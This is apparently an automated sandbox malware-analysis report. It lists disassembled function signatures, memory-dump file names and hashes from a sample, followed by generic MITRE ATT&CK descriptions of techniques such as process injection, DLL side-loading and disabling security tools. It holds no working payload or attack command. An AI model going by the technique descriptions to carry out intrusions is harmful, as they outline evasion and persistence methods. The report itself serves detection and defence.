Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: fprintf
String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4283191376
Opcode ID: 14c51567a3860b6bc97f98f006ee49fb41c3379164caa194474656353d69950b
Instruction ID: 41df258ec9fffa48b6752a328ea2995d5c33b735198bdfa23bf4ec9c611cfd66
Opcode Fuzzy Hash: 14c51567a3860b6bc97f98f006ee49fb41c3379164caa194474656353d69950b
Instruction Fuzzy Hash: BFF04F22918E8592D212CF19A4001AA7364FF4D799F585326EA8D76665DF28E5438700

Function 00007FF65022E390 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF65022E370

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF65022E357
Argument domain error (DOMAIN), xrefs: 00007FF65022E390

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: fprintf
String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2713391170
Opcode ID: 5c85093b147d1019dd0a804187a52c1ec3df5f9400b934be2122cf81485debb3
Instruction ID: 0a9530d64dd511ad6cc93786381ddc868bf5a02aa9ca56a70d6a2000f3beb984
Opcode Fuzzy Hash: 5c85093b147d1019dd0a804187a52c1ec3df5f9400b934be2122cf81485debb3
Instruction Fuzzy Hash: 0EF04F22908E8692D212CF19A4001AA7364FF4D799F585326EA8D76665DF28E5438700

Function 00007FF65022E3D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF65022E370

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF65022E357
Total loss of significance (TLOSS), xrefs: 00007FF65022E3D0

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: fprintf
String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4273532761
Opcode ID: 505fb02ea3ddbe0586ed915dce5c9b3036b4362b7f233f424ddae35eedb8b362
Instruction ID: e79e8cc4fc2a4fd0928da50a6c1952aa19735ea9d8de9b468025288114ef58bd
Opcode Fuzzy Hash: 505fb02ea3ddbe0586ed915dce5c9b3036b4362b7f233f424ddae35eedb8b362
Instruction Fuzzy Hash: 29F04F22908E8692D2128F19A4011AA7364FF4D799F595326EA8D76625DF28E5438700

Function 00007FF65022E3C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF65022E370

Strings

The result is too small to be represented (UNDERFLOW), xrefs: 00007FF65022E3C0
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF65022E357

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: fprintf
String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2187435201
Opcode ID: 161c91b47cf0f2cbc665028cd511bf77279a09f276d4fdfe26771d9a20d11c53
Instruction ID: 0d3503193d4fc4e3655edbaccadb28963d6456e573a30ee8c387623be321df7b
Opcode Fuzzy Hash: 161c91b47cf0f2cbc665028cd511bf77279a09f276d4fdfe26771d9a20d11c53
Instruction Fuzzy Hash: A2F04F26908E8592D212CF19A4001AA7364FF4D799F585326EA8D76265DF28E5438700

Function 00007FF65022E328 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF65022E370

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF65022E357
Argument singularity (SIGN), xrefs: 00007FF65022E328

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: fprintf
String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2468659920
Opcode ID: fcd2f609e7f223da69f165f25b87fb25282118e9ae36898b0305bd1bd3ade028
Instruction ID: ca945b37119a11721cba67a73fcbae62255e1481e86ebf96abe312d47fcbe012
Opcode Fuzzy Hash: fcd2f609e7f223da69f165f25b87fb25282118e9ae36898b0305bd1bd3ade028
Instruction Fuzzy Hash: 95F09622908E8592D302CF1CA4001AB7374FF4D799F185326EF8C76225DF28D5438700

Function 000001B630F67356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON

Download Yara Rule

APIs

__std_exception_copy.LIBVCRUNTIME ref: 000001B630F6737C

Strings

riptor at (, xrefs: 000001B630F67364
ierarchy Descriptor', xrefs: 000001B630F67381

Memory Dump Source

Source File: 00000002.00000002.1972631076.000001B630F60000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001B630F60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b630f60000_GR55Qg1hth.jbxd

Similarity

API ID: __std_exception_copy
String ID: ierarchy Descriptor'$riptor at (
API String ID: 592178966-758928094
Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
Instruction ID: 1cf5e14392f2a44a2fc60c929d4c85e0311c6b45d6dce6455f309635c247e02f
Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
Instruction Fuzzy Hash: 65E04F61640B48D1EB018F21E8406E873A0AB6CF64B589122DE5C46361EB7CD1EDC301

Function 000001B630F673B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON

Download Yara Rule

APIs

__std_exception_copy.LIBVCRUNTIME ref: 000001B630F673D8

Strings

riptor at (, xrefs: 000001B630F673C0
Locator', xrefs: 000001B630F673DD

Memory Dump Source

Source File: 00000002.00000002.1972631076.000001B630F60000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001B630F60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b630f60000_GR55Qg1hth.jbxd

Similarity

API ID: __std_exception_copy
String ID: Locator'$riptor at (
API String ID: 592178966-4215709766
Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
Instruction ID: a12eb2fd36644d3968e39a20d36077860ddc3d5b3b6908a845ff1751ff11109c
Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
Instruction Fuzzy Hash: 70E08671640B48C0EF018F21D4406E873E0F76CF54B889122CE4C46321EB3CD1E9C300

Function 00007FF650239310 Relevance: 5.1, APIs: 4, Instructions: 84COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF650239357
LeaveCriticalSection.KERNEL32 ref: 00007FF650239381

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 959defe685b640915e4595d737b319956bc1311b245fa585c7dce49d1b130bdf
Instruction ID: abfd6aeaef424ab54a7cdd533b718ce3ed3bc5deea9070b19a431c8d3c46583b
Opcode Fuzzy Hash: 959defe685b640915e4595d737b319956bc1311b245fa585c7dce49d1b130bdf
Instruction Fuzzy Hash: 3E315072A18642ABE794CF3194406BA2790FB49B6CF5C4136DE299A3D4DF3CD885CB50

Function 00007FF650239640 Relevance: 5.1, APIs: 4, Instructions: 83COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF650239659
LeaveCriticalSection.KERNEL32 ref: 00007FF65023966F

Part of subcall function 00007FF650238640: EnterCriticalSection.KERNEL32 ref: 00007FF650238658
Part of subcall function 00007FF650238640: ReleaseSemaphore.KERNEL32 ref: 00007FF650238686
Part of subcall function 00007FF650238640: LeaveCriticalSection.KERNEL32 ref: 00007FF650238693

LeaveCriticalSection.KERNEL32 ref: 00007FF6502396D3

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$ReleaseSemaphore
String ID:
API String ID: 3630377130-0
Opcode ID: a67a09f4d187a599d055ff11ed998ab8fcdd49affbb6f0129b7d1f2afb771be5
Instruction ID: 14ca3ed4c633e9e567b852820b1a4edcdb2bac1c8ca9a0a609df703e3233d8c2
Opcode Fuzzy Hash: a67a09f4d187a599d055ff11ed998ab8fcdd49affbb6f0129b7d1f2afb771be5
Instruction Fuzzy Hash: 65317872A04A03ABE7508F36D9012AA37A4FB89BA8F484131DE1DD7385DF38E485CB10

Function 00007FF6502391D0 Relevance: 5.1, APIs: 4, Instructions: 81COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF650239217
LeaveCriticalSection.KERNEL32 ref: 00007FF65023923E

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 2e7b2cbae20418b4c0d453f8b4b50e77aefd59ea86c03595ff55a991a6a710d5
Instruction ID: 874e65cf1b48dac332c680eae8b9458a47d6a0ab99cbedb04b6bd6ea64194bd9
Opcode Fuzzy Hash: 2e7b2cbae20418b4c0d453f8b4b50e77aefd59ea86c03595ff55a991a6a710d5
Instruction Fuzzy Hash: 39318473A08603ABDB84CF35D5402A937A4FB49B68F5C8635DD199A788DF38D485CB50

Function 00007FF650238EE0 Relevance: 5.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,00007FF650239509), ref: 00007FF650238F06
LeaveCriticalSection.KERNEL32(?,00007FF650239509,?,?,?,?,?,?,?,?,?,?,?,00007FF65047F400,?), ref: 00007FF650238F2B
EnterCriticalSection.KERNEL32(?,00007FF650239509,?,?,?,?,?,?,?,?,?,?,?,00007FF65047F400,?), ref: 00007FF650238F5C
LeaveCriticalSection.KERNEL32(?,00007FF650239509,?,?,?,?,?,?,?,?,?,?,?,00007FF65047F400,?), ref: 00007FF650238F66

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 443565f992c4bd1cd09b56ac24280876d411eae57f5959cf7ad58327f286b010
Instruction ID: 9e627cfea4a34ead991e583a49852c715b1e2c7d23bbd29cc35a7826bd53cc9c
Opcode Fuzzy Hash: 443565f992c4bd1cd09b56ac24280876d411eae57f5959cf7ad58327f286b010
Instruction Fuzzy Hash: 9501F222B19746A9E615EB23BD40A7B6A50BF88FEDF891031ED0D5BB50CD3CE4868340

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

